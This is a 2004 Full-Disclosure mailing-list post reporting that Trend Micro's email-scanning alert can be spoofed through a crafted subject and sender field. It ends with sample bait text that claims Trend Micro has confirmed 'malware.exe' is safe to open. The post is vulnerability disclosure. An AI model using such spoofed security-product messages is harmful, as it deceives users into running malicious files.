Subject: [Full-Disclosure] TREND MICRO: The Protector Becomes The Vector Take II
Message-ID: <200406071431.i57EV1Vb015632@web121.megawebservers.com>

Monday, June 07, 2004

Further to the examination of this:

[see: http://securityfocus.com/archive/1/365050/2004-05-28/2004-06-03/0 ]

It may very well be that alert file while in the temporary folder does not in fact run under the so-called "My Computer" zone. Previous testing required irritatingly precise manual construction of the .zip file with test string therein by the counting off the amount of desired html characters to test against the name of the file in the .zip and manually modifying it accordingly. While the overall html concept and problem is sound as demonstrated, we today find a much easier and default and perhaps even worse problem than before.

Incoming Email:

The gadget has a scanning mechanism for incoming email messages utilising the exact same alert scheme.
In this instance everything is set on default and we need not enclose our "bait" in a container and fiddle for hours with its name. We have a subject and a sender field. In this case we do like so:

Your Safe File
Trend Micro Internet Security confirms this file
malware.exe is safe to open. Proceed.